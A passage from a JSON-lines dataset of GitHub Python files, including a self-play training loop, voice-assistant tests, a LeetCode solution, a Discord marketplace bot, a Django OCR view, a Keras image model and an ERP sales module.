pool = multiprocessing.Pool(processes=1)\n pool.apply_async(CheckResultAndSaveNetwork,args=(pwins,nwins,draws,self.game,self.args,iter_num,))\n pool.close()\n pool.join()\n\n def learn(self):\n \"\"\"\n Performs numIters iterations with numEps episodes of self-play in each\n iteration. After every iteration, it retrains neural network with\n examples in trainExamples (which has a maximium length of maxlenofQueue).\n It then pits the new neural network against the old one and accepts it\n only if it wins >= updateThreshold fraction of games.\n \"\"\"\n\n for i in range(1528, self.args.numIters+1):\n print('------ITER ' + str(i) + '------')\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n temp = self.parallel_self_play()\n iterationTrainExamples += temp\n self.trainExamplesHistory.append(iterationTrainExamples)\n self.parallel_train_network(i)\n self.trainExamplesHistory.clear()\n self.parallel_self_test_play(i)","repo_name":"JernejHenigman/MasterThesisAZ","sub_path":"CoachMutliProc.py","file_name":"CoachMutliProc.py","file_ext":"py","file_size_in_byte":9226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29035274227","text":"import alice.tests.library.auth as auth\nimport alice.tests.library.scenario as scenario\nimport alice.tests.library.surface as surface\nimport pytest\n\nfrom external_skills.common import ExternalSkillIntents\n\n\ndef _check_suggests(response):\n suggests = {s.title for s in response.suggests}\n assert 'Покажи другую' in suggests\n assert 'Включи игру' in suggests\n\n\n@pytest.mark.oauth(auth.YandexPlus)\n@pytest.mark.experiments(f'mm_enable_protocol_scenario={scenario.GameSuggest}')\n@pytest.mark.parametrize('surface', [\n surface.searchapp,\n surface.station,\n])\nclass TestGameSuggest(object):\n '''\n https://testpalm.yandex-team.ru/testcase/alice-2620\n '''\n\n owners = ('dan-anastasev',)\n\n def test_game_suggest_scenario(self, alice):\n response = alice('Посоветуй в какую игру мне поиграть')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice('Хватит')\n assert response.scenario not in [scenario.GameSuggest, scenario.Dialogovo]\n\n response = alice('Посоветуй в какую игру мне поиграть')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice('Покажи другую')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice('Включи игру')\n assert response.scenario == scenario.Dialogovo\n assert response.intent == ExternalSkillIntents.Request\n\n @pytest.mark.parametrize('start', ['Давай'])\n def test_game_suggest_other_phrases(self, alice, start):\n response = alice('Посоветуй в какую игру мне поиграть')\n assert response.scenario == scenario.GameSuggest\n _check_suggests(response)\n\n response = alice(start)\n assert response.scenario == scenario.Dialogovo\n assert response.intent == ExternalSkillIntents.Request\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Voice Assistant tests/tests/integration_tests/advisers/testpalm_game_suggest.py","file_name":"testpalm_game_suggest.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36437707775","text":"class Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, K: int) -> List[int]:\n\n def dfs(node, parent):\n if node:\n node.parent = parent\n dfs(node.left, node)\n dfs(node.right, node)\n\n dfs(root, None)\n\n queue = [(target, 0)]\n seen = {target}\n\n while queue:\n if queue[0][1] == K:\n return [node.val for node, d in queue]\n node, d = queue.pop(0)\n for neighbor in (node.left, node.right, node.parent):\n if neighbor and neighbor not in seen:\n seen.add(neighbor)\n queue.append((neighbor, d+1))\n return []\n","repo_name":"sinoyuco/leetcode_solutions","sub_path":"tree/nodes_distance_k.py","file_name":"nodes_distance_k.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13123714406","text":"import nextcord\r\nfrom hashlib import md5\r\n\r\nfrom nextcord.ext import commands, application_checks\r\nfrom datetime import datetime\r\nfrom configs.config_menager import config_get, message_get\r\nfrom database.conection import db\r\n\r\n\r\nclass Modal(nextcord.ui.Modal):\r\n def __init__(self, messages: list, bot: commands.Bot, **kwargs: nextcord.ui.text_input.TextInput):\r\n self.bot = bot\r\n self.kwargs = kwargs\r\n super().__init__(messages[\"modal\"])\r\n [self.add_item(val) for val in self.kwargs.values()]\r\n\r\n async def callback(self, interaction: nextcord.Interaction):\r\n color = config_get(\"color\")\r\n command = [self.kwargs.get(key).custom_id for key in self.kwargs.keys()]\r\n values = [self.kwargs.get(key).value for key in self.kwargs.keys()]\r\n user, channel = interaction.user, interaction.channel\r\n\r\n if command[0][:5] == \"price\":\r\n suffix = int(command[0][6:])\r\n command = command[0][:5]\r\n\r\n if \"name\" in command:\r\n hash = f\"{user.id}_{datetime.now()}\"\r\n hash = md5(hash.encode()).hexdigest()\r\n await db[\"products\"].insert_one({\r\n \"_id\": hash,\r\n \"price\": 0,\r\n \"holder\": user.id,\r\n \"name\": values[0],\r\n \"privat\": values[1],\r\n \"thread\": \"\",\r\n })\r\n\r\n messages = message_get(\"created\")\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=messages[\"desc\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n await interaction.send(embed=emb, ephemeral=True)\r\n \r\n if command == \"price\":\r\n try:\r\n price = int(values[0])\r\n messages = message_get(\"price\")\r\n except ValueError:\r\n messages = message_get(\"error1\")\r\n return await interaction.send(messages[\"text\"], ephemeral=True)\r\n \r\n products = [i async for i in db[\"products\"].find({\"holder\": user.id, \"price\": 0})][suffix]\r\n msg = await channel.fetch_message((await db[\"users\"].find_one({\"_id\": user.id}))[\"message\"])\r\n\r\n catalog_channel = interaction.guild.get_channel(config_get(\"catalog\"))\r\n emb = nextcord.Embed(title=f\"{products['name']} - {price}$\",\r\n description=f\"id - {products['_id']}\\nauthor - {user.name}\",\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [\"buy\", None, nextcord.ButtonStyle.success, \"buy\", 1, None, False],\r\n [\"take off\", None, nextcord.ButtonStyle.danger, \"take_off\", 1, None, False],\r\n ]\r\n thread = await catalog_channel.create_thread(name=f\"{products['name']} - {price}$\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=messages[\"desc\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.secondary, \"menu\", 1, None, False],\r\n ]\r\n await msg.edit(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n await db[\"products\"].update_one({\"_id\": products['_id']}, {\"$set\": {\"price\": price, \"thread\": thread.id}})\r\n\r\n\r\nclass Button(nextcord.ui.Button[\"ViewButton\"]):\r\n def __init__(self, bot: commands.Bot, *args):\r\n super().__init__(label=args[0], emoji=args[1], style=args[2], custom_id=args[3], row=args[4], url=args[5], disabled=args[6])\r\n self.bot = bot\r\n\r\n async def callback(self, interaction: nextcord.Interaction):\r\n command = self.custom_id\r\n\r\n if command[:11] == \"show_hidden\":\r\n suffix = int(command[12:])\r\n command = command[:11]\r\n elif command[:4] == \"show\":\r\n suffix = int(command[5:])\r\n command = command[:4]\r\n elif command[:4] == \"sell\":\r\n suffix = int(command[5:])\r\n command = command[:4]\r\n\r\n color, messages = config_get(\"color\"), message_get(command)\r\n user, channel = interaction.user, interaction.channel\r\n\r\n if command == \"open\":\r\n if await db[\"users\"].find_one({ \"_id\": user.id }) == None:\r\n await db[\"users\"].insert_one({\r\n \"_id\": user.id,\r\n \"balance\": 10,\r\n \"message\": 0,\r\n \"thread\": 0,\r\n \"action\": \"menu\"\r\n })\r\n balance = 10\r\n member = await interaction.guild.fetch_member(user.id)\r\n catalog = interaction.guild.get_channel(config_get(\"catalog\"))\r\n await catalog.set_permissions(member, read_messages=True)\r\n else:\r\n user_db = await db[\"users\"].find_one({ \"_id\": user.id })\r\n thread, balance = user_db[\"thread\"], user_db[\"balance\"]\r\n await channel.get_thread(thread).delete()\r\n await db[\"creations\"].delete_one({\"_id\": user.id})\r\n\r\n thread = await channel.create_thread(name=f\"menu ({user.name})\",\r\n auto_archive_duration=1440,\r\n type=nextcord.ChannelType.private_thread,\r\n reason=None)\r\n emb = nextcord.Embed(title=messages[\"title\"]+user.name,\r\n description=messages[\"desc\"]+str(balance),\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.success, \"show_0\", 1, None, False],\r\n [messages[\"btns\"][1], None, nextcord.ButtonStyle.primary, \"create\", 1, None, False],\r\n ]\r\n msg = await thread.send(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n await db[\"users\"].update_one({\"_id\": user.id}, {\"$set\": {\"message\": msg.id, \"thread\": thread.id, \"action\": \"menu\"}})\r\n\r\n elif command == \"menu\":\r\n messages = message_get(\"open\")\r\n user_db = await db[\"users\"].find_one({\"_id\": user.id})\r\n msg = await channel.fetch_message(user_db[\"message\"])\r\n await db[\"creations\"].delete_one({\"_id\": user.id})\r\n\r\n emb = nextcord.Embed(title=messages[\"title\"]+user.name,\r\n description=messages[\"desc\"]+str(user_db[\"balance\"]),\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.success, \"show_0\", 1, None, False],\r\n [messages[\"btns\"][1], None, nextcord.ButtonStyle.primary, \"create\", 1, None, False],\r\n ]\r\n await msg.edit(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n await db[\"users\"].update_one({\"_id\": user.id}, {\"$set\": {\"action\": \"menu\"}})\r\n\r\n elif command == \"show\":\r\n msg = await channel.fetch_message((await db[\"users\"].find_one({\"_id\": user.id}))[\"message\"])\r\n products = [i async for i in db[\"products\"].find({\"holder\": user.id, \"price\": 0})]\r\n if len(products) == 0:\r\n return await interaction.send(messages[\"text\"], ephemeral=True)\r\n\r\n emb = nextcord.Embed(title=f\"{suffix+1}/{len(products)}\",\r\n description=products[suffix][\"name\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.secondary, f\"show_{suffix-1}\", 1, None, True if suffix == 0 else False],\r\n [messages[\"btns\"][1], None, nextcord.ButtonStyle.success, f\"show_hidden_{suffix}\", 1, None, False],\r\n [messages[\"btns\"][2], None, nextcord.ButtonStyle.primary, f\"sell_{suffix}\", 1, None, False],\r\n [messages[\"btns\"][3], None, nextcord.ButtonStyle.secondary, f\"show_{suffix+1}\", 1, None, True if suffix+1 == len(products) else False],\r\n [messages[\"btns\"][4], None, nextcord.ButtonStyle.danger, \"menu\", 2, None, False],\r\n ]\r\n await msg.edit(f\"<@{user.id}>\", embed=emb, view=ViewButton(self.bot, buttons))\r\n \r\n elif command == \"create\":\r\n emOne = nextcord.ui.TextInput(\r\n label=messages[\"labels\"][0],\r\n min_length=4,\r\n max_length=32,\r\n required=True,\r\n custom_id=\"name\",\r\n style=nextcord.TextInputStyle.short\r\n )\r\n emTwo = nextcord.ui.TextInput(\r\n label=messages[\"labels\"][1],\r\n min_length=1,\r\n max_length=200,\r\n required=True,\r\n custom_id=\"privat\",\r\n style=nextcord.TextInputStyle.short\r\n )\r\n await interaction.response.send_modal(Modal(messages, self.bot, emOne=emOne, emTwo=emTwo))\r\n \r\n elif command == \"show_hidden\":\r\n products = [i async for i in db[\"products\"].find({\"holder\": user.id})]\r\n await interaction.send(products[suffix][\"privat\"], ephemeral=True)\r\n \r\n elif command == \"sell\":\r\n emOne = nextcord.ui.TextInput(\r\n label=messages[\"labels\"][0],\r\n min_length=1,\r\n max_length=5,\r\n required=True,\r\n custom_id=f\"price_{suffix}\",\r\n style=nextcord.TextInputStyle.short\r\n )\r\n await interaction.response.send_modal(Modal(messages, self.bot, emOne=emOne))\r\n\r\n elif command == \"buy\":\r\n product = await db[\"products\"].find_one({\"thread\": channel.id})\r\n user_db = await db[\"users\"].find_one({\"_id\": user.id})\r\n holder_db = await db[\"users\"].find_one({\"_id\": product[\"holder\"]})\r\n\r\n if user_db[\"balance\"] >= product[\"price\"]:\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=product[\"privat\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n await interaction.send(embed=emb, ephemeral=True)\r\n\r\n catalog_channel = interaction.guild.get_channel(config_get(\"catalog\"))\r\n thread = catalog_channel.get_thread(channel.id)\r\n await thread.edit(archived=True, locked=True)\r\n\r\n await db[\"products\"].update_one({\"_id\": product['_id']}, {\"$set\": {\"price\": 0, \"holder\": user.id, \"thread\": \"\"}})\r\n await db[\"users\"].update_one({\"_id\": holder_db[\"_id\"]}, {\"$set\": {\"balance\": holder_db[\"balance\"]+product[\"price\"]}})\r\n await db[\"users\"].update_one({\"_id\": user.id}, {\"$set\": {\"balance\": user_db[\"balance\"]-product[\"price\"]}})\r\n\r\n else:\r\n await interaction.send(messages[\"text\"], ephemeral=True)\r\n\r\n elif command == \"take_off\":\r\n product = await db[\"products\"].find_one({\"thread\": channel.id})\r\n if product[\"holder\"] == user.id:\r\n catalog_channel = interaction.guild.get_channel(config_get(\"catalog\"))\r\n thread = catalog_channel.get_thread(channel.id)\r\n await thread.edit(archived=True, locked=True)\r\n await db[\"products\"].update_one({\"_id\": product['_id']}, {\"$set\": {\"price\": 0, \"thread\": \"\"}})\r\n\r\n else:\r\n await interaction.send(messages[\"text\"], ephemeral=True)\r\n\r\n\r\nclass ViewButton(nextcord.ui.View):\r\n def __init__(self, bot: commands.Bot, elem: list):\r\n super().__init__(timeout = None)\r\n [self.add_item(Button(bot, elem[i][0], elem[i][1], elem[i][2], elem[i][3], elem[i][4], elem[i][5], elem[i][6])) for i in range(len(elem))]\r\n\r\n\r\nclass Menu(commands.Cog):\r\n def __init__(self, bot: commands.Bot):\r\n self.bot = bot\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n custom_ids = [\"open\", \"menu\", \"show_0\", \"create\", \"buy\", \"take_off\"]\r\n [self.bot.add_view(ViewButton(bot=self.bot, elem=[[None, None, None, i, 1, None, None]])) for i in custom_ids]\r\n\r\n @nextcord.slash_command()\r\n @application_checks.is_owner()\r\n async def menu_setting(self, interaction: nextcord.Interaction):\r\n color, messages = config_get(\"color\"), message_get(\"menu_channel\")\r\n emb = nextcord.Embed(title=messages[\"title\"],\r\n description=messages[\"desc\"],\r\n color=nextcord.Color.from_rgb(r=color[0], g=color[1], b=color[2]))\r\n buttons = [\r\n [messages[\"btns\"][0], None, nextcord.ButtonStyle.success, \"open\", 1, None, False],\r\n ]\r\n channel = interaction.guild.get_channel(config_get(\"menu\"))\r\n await channel.send(embed=emb, view=ViewButton(self.bot, buttons))\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Menu(bot))","repo_name":"belkinark/Discord-Market","sub_path":"cogs/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":13266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42507932019","text":"expressão = input('Digite sua expressão aqui: ')\npilha = []\nfor simbolo in expressão:\n if simbolo == '(':\n pilha.append(simbolo)\n elif simbolo == ')':\n if len(pilha) > 0:\n pilha.pop()\n else:\n pilha.append(')')\nif len(pilha) == 0:\n print('Sua experssão está certa!')\nelse:\n print('Sua expressão está errada...')\n","repo_name":"Thalesamaojapa/Thales---Python","sub_path":"Exercícios_Main/Exercícios/Exercício83(ValidaçãoDeExpressão).py","file_name":"Exercício83(ValidaçãoDeExpressão).py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37992662269","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import goovi_db\nfrom .forms import goovi_form\nimport io\nimport os\nfrom google.cloud import vision\nfrom google.cloud.vision import types\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndef goovi_api(filename):\n client = vision.ImageAnnotatorClient()\n with io.open(filename,'rb') as image_file:\n content = image_file.read()\n image = types.Image(content=content)\n response = client.text_detection(image=image)\n texts = response.text_annotations\n return texts[0].description\n\ndef index(request):\n if(request.method == 'POST'):\n y = goovi_form(request.POST,request.FILES)\n if(y.is_valid()):\n x = goovi_db()\n x.name = y.cleaned_data[\"name\"]\n x.file = y.cleaned_data[\"file\"]\n x.data = \"test data\"\n x.save()\n data = goovi_api(BASE_DIR+\"/goovi/\"+goovi_db.objects.get(name=y.cleaned_data[\"name\"]).file.url)\n context = {'form':y,'data':data }\n else:\n form = goovi_form()\n context = {'form':form}\n return render(request,\"index.html\",context)\n","repo_name":"sivajsp/OCR-App","sub_path":"goovi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39264276221","text":"from keras.layers import Conv2D, Activation, MaxPool2D, Flatten, Dense, Dropout\nfrom keras.models import Sequential\nfrom features import downloadimages, getlikes\nimport numpy as np\nimport cv2\nimport glob\n\n\nIMAGESIZE = (200, 200)\nTRAININGPERCENT = 0.7\n\n# downloadimages(src='../data/pickledump',\n# destination='../data/download/')\n\n# get likes array where Nth element corresponds to the number of likes\n# on image ../data/download/N.jpeg\nlikes = getlikes(src='../data/pickledump')\n\nlikesraw = np.array(likes)\nlikes = (likesraw - np.mean(likesraw))/np.std(likesraw) # normalize\n\nimages = []\n\n# read images and resize them\nfor imgfile in glob.glob('../data/download/*.jpeg'):\n img = cv2.imread(imgfile)\n resized = cv2.resize(img, IMAGESIZE)\n images.append(resized)\n\nimages = np.array(images)\n\n# partition training/testing sets\ntraining_num = int(TRAININGPERCENT * len(images))\n\nx_train = images[: training_num]\ny_train = likes[:training_num]\n\nx_test = images[training_num:]\ny_test = likes[training_num:]\n\n# create model and add layers\nmodel = Sequential()\n\nmodel.add(Conv2D(10, 5, 5, activation='relu',\n input_shape=(IMAGESIZE[0], IMAGESIZE[1], 3)))\n\nmodel.add(Conv2D(10, 5, 5, activation='relu'))\nmodel.add(MaxPool2D((5, 5)))\nmodel.add(Dropout(0.2))\nmodel.add(Flatten())\nmodel.add(Dense(50))\nmodel.add(Activation('relu'))\nmodel.add(Dense(1))\n\nprint(model.summary())\n\nmodel.compile(loss='mse',\n optimizer='rmsprop')\n\nmodel.fit(x_train, y_train, epochs=10, shuffle=True,\n validation_data=(x_test, y_test))\n\nmodel.save('../models/regv1.h')\n\nscore = model.evaluate(x_test, y_test)\nprint('test set mse is {}'.format(score))\n","repo_name":"ninesalt/lipy","sub_path":"src/lipy.py","file_name":"lipy.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"}
+{"seq_id":"29093910772","text":"# global 关键\n# nonlocal 3.2 +\n\n# num +=1\n# 如果说我们在函数里使用global关键声明的变量 自动提升到全局作用域\nnum = 0\n\n\ndef test(n):\n global num\n num = num + 1\n print(num)\n\n\ntest(1)\n","repo_name":"zhangwei725/PythonBase","sub_path":"day07/函数_关键字_global.py","file_name":"函数_关键字_global.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"17144917486","text":"import os\nimport ui\nimport data_manager\nimport common\n\n\ndef start_module():\n while True:\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n options = [\n \"Display table\",\n \"Add\",\n \"Remove\",\n \"Update\",\n \"The ID of the item sold for the lowest price\",\n \"Items that are sold between two given dates\",\n \"Get the title of the item by ID\",\n \"Get the title of the item by ID from table\",\n \"Get the ID of the item sold last\",\n \"Get the ID of the item sold last from table\",\n \"Get the title of the item sold last from table\",\n \"Get the sum of prices of the given item IDs\",\n \"Get the sum of prices of the given item IDs from table\",\n \"Get the customer ID by the given sale ID\",\n \"Get the customer ID by the given sale ID from table\",\n \"Get all customer IDs\",\n \"Get all customer IDs from table\",\n \"Get all sales IDs for the customer IDs\",\n \"Get all sales IDs for the customer IDs from table\",\n \"Get the number of sales per customer IDs\",\n \"Get the number of sales per customer IDs from table\"]\n ui.print_menu(\"\\nSales menu\", options, \"Main menu\")\n inputs = ui.get_inputs([\"Please, choose an option: \"], \"\")\n option = inputs[0]\n if option == \"1\":\n os.system(\"clear\")\n show_table(datas)\n elif option == \"2\":\n os.system(\"clear\")\n add(datas)\n write_to_file(datas)\n elif option == \"3\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter an ID to remove the line: \"], \"\")\n remove(datas, given_id)\n write_to_file(datas)\n elif option == \"4\":\n os.system(\"clear\")\n update_id = ui.get_inputs([\"Please, enter an ID to update the line: \"], \"\")\n update(datas, update_id)\n write_to_file(datas)\n elif option == \"5\":\n os.system(\"clear\")\n ui.print_result(get_lowest_price_item_id(datas), \"The ID of the item sold for the lowest price:\")\n elif option == \"6\":\n os.system(\"clear\")\n date_list = ui.get_inputs([\"Month from: \", \"Day from: \", \"Year from: \",\n \"Month to: \", \"Day to: \", \"Year to: \"], \"Please, add the dates!\")\n ui.print_result(\n get_items_sold_between(\n datas, int(\n date_list[0]), int(\n date_list[1]), int(\n date_list[2]), int(\n date_list[3]), int(\n date_list[4]), int(\n date_list[5])), \"Items that are sold between two given dates:\\n\")\n elif option == \"7\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter an ID to get the title: \"], \"\")\n ui.print_result(get_title_by_id(given_id[0]), \"The title of the item by ID:\")\n elif option == \"8\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter an ID to get the title: \"], \"\")\n ui.print_result(get_title_by_id_from_table(datas, given_id[0]), \"The title of the item by ID:\")\n elif option == \"9\":\n os.system(\"clear\")\n ui.print_result(get_item_id_sold_last(), \"The ID of the item sold last:\")\n elif option == \"10\":\n os.system(\"clear\")\n ui.print_result(get_item_id_sold_last_from_table(datas), \"The ID of the item sold last:\")\n elif option == \"11\":\n os.system(\"clear\")\n ui.print_result(get_item_title_sold_last_from_table(datas), \"The title of the item sold last:\")\n elif option == \"12\":\n os.system(\"clear\")\n given_ids = ui.get_inputs(\n [\"Please, enter the IDs (seperated by comma) to get the sum of the prices of the items: \"], \"\")\n splitted_given_ids = given_ids[0].split(\",\")\n ui.print_result(get_the_sum_of_prices(splitted_given_ids), \"The sum of prices of the given item IDs:\")\n elif option == \"13\":\n os.system(\"clear\")\n given_ids = ui.get_inputs(\n [\"Please, enter the IDs (seperated by comma) to get the sum of the prices of the items: \"], \"\")\n splitted_given_ids = given_ids[0].split(\",\")\n ui.print_result(\n get_the_sum_of_prices_from_table(\n datas,\n splitted_given_ids),\n \"The sum of prices of the given item IDs:\")\n elif option == \"14\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter the sale ID to get the customer ID: \"], \"\")\n ui.print_result(get_customer_id_by_sale_id(given_id[0]), \"The customer ID by the given sale ID:\")\n elif option == \"15\":\n os.system(\"clear\")\n given_id = ui.get_inputs([\"Please, enter the sale ID to get the customer ID: \"], \"\")\n ui.print_result(\n get_customer_id_by_sale_id_from_table(\n datas,\n given_id[0]),\n \"The customer ID by the given sale ID:\")\n elif option == \"16\":\n os.system(\"clear\")\n ui.print_result(get_all_customer_ids(), \"All customer IDs:\")\n elif option == \"17\":\n os.system(\"clear\")\n ui.print_result(get_all_customer_ids_from_table(datas), \"All customer IDs:\")\n elif option == \"18\":\n os.system(\"clear\")\n ui.print_result(get_all_sales_ids_for_customer_ids(), \"All sale IDs for the customer IDs:\")\n elif option == \"19\":\n os.system(\"clear\")\n ui.print_result(get_all_sales_ids_for_customer_ids_from_table(datas), \"All sale IDs for the customer IDs:\")\n elif option == \"20\":\n os.system(\"clear\")\n ui.print_result(get_num_of_sales_per_customer_ids(), \"The number of sales per customer IDs:\")\n elif option == \"21\":\n os.system(\"clear\")\n ui.print_result(\n get_num_of_sales_per_customer_ids_from_table(datas),\n \"The number of sales per customer IDs:\")\n elif option == \"0\":\n os.system(\"clear\")\n break\n else:\n ui.print_error_message(\"There is no such option.\")\n\n\ndef show_table(table):\n module_headers = [\"ID\", \"Title\", \"Price\", \"Month\", \"Day\", \"Year\", \"Customer ID\"]\n return common.common_show_table(table, module_headers)\n\n\ndef add(table):\n module_headers = [\"Title: \", \"Price: \", \"Month: \", \"Day: \", \"Year: \", \"Customer ID: \"]\n return common.common_add(table, module_headers)\n\n\ndef write_to_file(table):\n return common.common_write_to_file(table, \"sales/sales.csv\")\n\n\ndef remove(table, id_):\n return common.common_remove(table, id_, \"sales/sales.csv\")\n\n\ndef update(table, id_):\n module_headers = [\"Title: \", \"Price: \", \"Month: \", \"Day: \", \"Year: \", \"Customer ID: \"]\n return common.common_update(table, id_, \"sales/sales.csv\", module_headers)\n\n\ndef get_lowest_price_item_id(table):\n prices = []\n lowest_ids = []\n for row in table:\n prices.append(int(row[2]))\n for row in table:\n if int(row[2]) == min(prices):\n lowest_ids.append(row[0])\n\n N = len(lowest_ids)\n iteration = 1\n while iteration < N:\n j = 0\n while j <= (N - 2):\n if lowest_ids[j] < lowest_ids[j + 1]:\n temp = lowest_ids[j + 1]\n lowest_ids[j + 1] = lowest_ids[j]\n lowest_ids[j] = temp\n j += 1\n else:\n j += 1\n iteration += 1\n return str(lowest_ids[0])\n\n\ndef get_items_sold_between(table, month_from, day_from, year_from, month_to, day_to, year_to):\n date_from = (year_from, month_from, day_from)\n date_to = (year_to, month_to, day_to)\n between_dates = []\n filtered_table = []\n for i in range(len(table)):\n actual_month = int(table[i][3])\n actual_day = int(table[i][4])\n actual_year = int(table[i][5])\n actual_date = (actual_year, actual_month, actual_day)\n if date_from < actual_date < date_to:\n between_dates.append(list(actual_date))\n for i in range(len(table)):\n for date in between_dates:\n table[i][5] = int(table[i][5])\n table[i][3] = int(table[i][3])\n table[i][4] = int(table[i][4])\n table[i][2] = int(table[i][2])\n if date[0] == table[i][5] and date[1] == table[i][3] and date[2] == table[i][4]:\n filtered_table.append(table[i])\n return filtered_table\n\n\ndef get_title_by_id(id):\n\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_title_by_id_from_table(datas, id)\n\n\ndef get_title_by_id_from_table(table, id):\n\n for i in range(len(table)):\n if table[i][0] == id:\n return table[i][1]\n\n\ndef get_item_id_sold_last():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_item_id_sold_last_from_table(datas)\n\n\ndef get_item_id_sold_last_from_table(table):\n dates = []\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n date = (year, month, day)\n dates.append(date)\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n if year and month and day in max(dates):\n return table[i][0]\n\n\ndef get_item_title_sold_last_from_table(table):\n dates = []\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n date = (year, month, day)\n dates.append(date)\n for i in range(len(table)):\n month = int(table[i][3])\n day = int(table[i][4])\n year = int(table[i][5])\n if year and month and day in max(dates):\n return table[i][1]\n\n\ndef get_the_sum_of_prices(item_ids):\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_the_sum_of_prices_from_table(datas, item_ids)\n\n\ndef get_the_sum_of_prices_from_table(table, item_ids):\n sum_of_items_price = 0\n for i in range(len(table)):\n if table[i][0] in item_ids:\n sum_of_items_price += int(table[i][2])\n return sum_of_items_price\n\n\ndef get_customer_id_by_sale_id(sale_id):\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_customer_id_by_sale_id_from_table(datas, sale_id)\n\n\ndef get_customer_id_by_sale_id_from_table(table, sale_id):\n for i in range(len(table)):\n if sale_id in table[i]:\n return table[i][6]\n\n\ndef get_all_customer_ids():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_all_customer_ids_from_table(datas)\n\n\ndef get_all_customer_ids_from_table(table):\n customer_ids = []\n for i in range(len(table)):\n customer_ids.append(table[i][6])\n return set(customer_ids)\n\n\ndef get_all_sales_ids_for_customer_ids():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_all_sales_ids_for_customer_ids_from_table(datas)\n\n\ndef get_all_sales_ids_for_customer_ids_from_table(table):\n ids = set()\n dict_ids = {}\n for line in table:\n ids.add(line[6])\n for item in ids:\n dict_ids[item] = []\n for line in table:\n actual_value = dict_ids[line[6]]\n actual_value.append(line[0])\n dict_ids[line[6]] = actual_value\n return dict_ids\n\n\ndef get_num_of_sales_per_customer_ids():\n datas = data_manager.get_table_from_file(\"sales/sales.csv\")\n return get_num_of_sales_per_customer_ids_from_table(datas)\n\n\ndef get_num_of_sales_per_customer_ids_from_table(table):\n id_connections = {}\n for i in range(len(table)):\n if table[i][6] in id_connections:\n id_connections[table[i][6]] += 1\n else:\n id_connections[table[i][6]] = 1\n return id_connections\n","repo_name":"AlexaPekar/codecool-pbwp-3rd-tw-lightweight-erp","sub_path":"sales/sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":12138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
